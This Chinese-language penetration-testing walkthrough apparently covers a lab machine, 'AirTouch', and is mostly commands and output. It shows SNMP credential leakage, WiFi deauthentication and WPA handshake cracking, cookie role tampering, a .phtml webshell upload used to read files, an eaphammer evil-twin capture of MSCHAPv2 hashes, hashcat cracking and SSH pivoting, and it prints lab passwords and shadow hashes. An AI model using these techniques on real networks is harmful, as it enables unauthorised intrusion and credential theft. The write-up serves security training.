基本信息

端口扫描

TCP只有22,udp可以看到snmp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ nmap -sC -sV -Pn 10.129.186.97
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 14:50 JST
Nmap scan report for 10.129.186.97
Host is up (0.081s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
|   256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
|_  256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.64 seconds

$ sudo nmap -sU 10.129.186.97
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 14:52 JST
Nmap scan report for 10.129.186.97
Host is up (0.081s latency).
Not shown: 998 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp

Nmap done: 1 IP address (1 host up) scanned in 1070.39 seconds

SNMP

常规snmp枚举发现一个密码:

1
2
3
4
5
snmpwalk -v 1 -c public 10.129.186.97

iso.3.6.1.2.1.1.1.0 = STRING: "\"The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)\""
iso.3.6.1.2.1.1.4.0 = STRING: "admin@AirTouch.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "Consultant"

consultant

得到的账号密码ssh登录:

用户桌面两张图表明现在是在consultant的笔记本里,连接的单独的vlan,并且存在其他网络及wifi:

并且当前consultant可以无限制sudo,以及存在aircrack,所以下一步很明显是通过wifi访问其他网络:

AirTouch-Internet

capture & crack

所以就是常规wifi枚举,然后deauth抓握手包破解:

1
2
3
4
5
6
7
8
9
10
11
12
# 启动监听模式
airmon-ng start wlan0

# 查看wifi
airodump-ng wlan0mon
# AirTouch-Internet chanel 6
 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29   48 - 1      0        4
 
# capture
airodump-ng -c 6 wlan0mon -w capture
# 另一个终端,deauth
aireplay-ng --deauth 10 -a F0:9F:C2:A3:F1:A7 wlan0mon -c 28:6C:07:FE:A3:22

回到第一个终端,看到已经获取到了握手包:

之后就是破解出密码:

1
2
3
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

KEY FOUND! [ challenge ]

wifi

之后连接wifi:

1
2
3
sudo wpa_supplicant -Dnl80211 -iwlan3 -c /tmp/miao.conf

sudo dhclient wlan3 -v

获取到192.168.3网段ip地址:

miao.conf

1
2
3
4
5
6
7
network={
  ssid="AirTouch-Internet"
  psk="challenge"
  scan_ssid=1
  key_mgmt=WPA-PSK
  proto=WPA2
}

PSK Router

之后打通代理,可以访问到PSK Router界面:

1
ssh consultant@10.129.186.105 -D 8090

但现在还不知道密码

decrypt capture

回到capture部分,wireshark使用密码解密流量,可以在http请求中得到cookie,捕获够的情况下也能直接获取密码:

1
2
manager
2wLFYNh4TSTgA5sNgT4

manager

修改cookie登录到manager,现在只是user:

admin

这部分很简单,cookie里有个UserRole,原本是user,自己改成admin即可,然后多了个上传配置文件的功能:

webshell

不能直接传php,基础绕过,可以可以上传phtml,phar之类,www-data权限:

并且直接读取login.php可以得到另一个user的密码:

1
2
3
4
5
6
http://192.168.3.1/uploads/shell.phtml?cmd=cat%20../login.php

$logins = array(
    /*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
    'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
  );

AirTouch-AP-PSK & user flag

使用user ssh登录进AirTouch-AP-PSK:

1
2
ssh user@192.168.3.1
JunDRDZKHDnpkpDDvay

无限制sudo,root用户目录得到user flag:

send_certs.sh

并且可以在send_certs.sh得到remote用户的密码和下一个网段的ip:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.

# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"

# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

以及certs-backup目录里一些证书文件,下一步要用到

eaphammer

回到AirTouch-Consultant那里,可以看到root目录有个eaphammer,很明显的提示下一步,evil twin attacks:

一步步来,得到AirTouch-Office的认证hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
./eaphammer --cert-wizard import --server-cert ../server.crt --private-key ../server.key --ca-cert ../ca.crt

./eaphammer --cert-wizard list 

./eaphammer --bssid 'AC:8B:A9:AA:3F:D2' --essid 'AirTouch-Office' --channel 44 --interface wlan3 --auth wpa-eap --creds

# 等几分钟,得到hash
mschapv2: Sat Jan 24 10:30:27 2026
	 domain\username:		AirTouch\r4ulcl
	 username:			r4ulcl
	 challenge:			cb:16:26:f1:1a:1b:da:47
	 response:			44:3f:b4:84:79:5a:c4:fa:3b:3e:f4:0c:77:3c:6d:f5:d0:23:f6:f1:bb:27:ab:ed
	 jtr NETNTLM:			r4ulcl:$NETNTLM$cb1626f11a1bda47$443fb484795ac4fa3b3ef40c773c6df5d023f6f1bb27abed
	 hashcat NETNTLM:		r4ulcl::::443fb484795ac4fa3b3ef40c773c6df5d023f6f1bb27abed:cb1626f11a1bda47

破解出密码:

1
2
3
$ sudo hashcat -m 5500 hash.txt ~/Tools/dict/rockyou.txt

laboratory

AirTouch-Office

然后连接office wifi,得到corp网段ip:

1
2
3
wpa_supplicant -B -i wlan6 -c /tmp/office.conf

dhclient wlan6

office.conf

1
2
3
4
5
6
7
8
9
ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\\r4ulcl"
    password="laboratory"
    phase2="auth=MSCHAPV2"
}

AirTouch-AP-MGT

之后remote用户连接AirTouch-AP-MGT,密码就是前面得到的:

1
2
ssh remote@10.10.10.1
xGgWEwqUpfoOVsLeROeG

hostapd

然后在hostapd相关文件里得到admin密码:

1
2
3
4
remote@AirTouch-AP-MGT:~$ cat /etc/hostapd/hostapd_wpe.eap_user

"AirTouch\r4ulcl"			    MSCHAPV2		"laboratory" [2]
"admin"			                MSCHAPV2		"xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]

admin

切到admin用户,可以无限制sudo:

root flag

admin无限制sudo:

shadow

1
2
remote:$6$ejcLoDyi/qlm6pQd$0pt.GvF47D3LbKCaJ283OVQ1Fi25cxqNy8sgO5mnsnIujrWOGkoGL/./5vAmdb5JSHGu0vPTE./Rh8bf6AJKZ1:20051:0:99999:7:::
admin:$6$vSTu8Nz336boicIm$pq/RGKu7jne0kd18NC9QgB8WCliwCbZTgiP.g71YI6BchhHvVRiW40W.GoMl9rGv6EyKyYaUxzRP5XWYIiKyL.:20051:0:99999:7:::

参考资料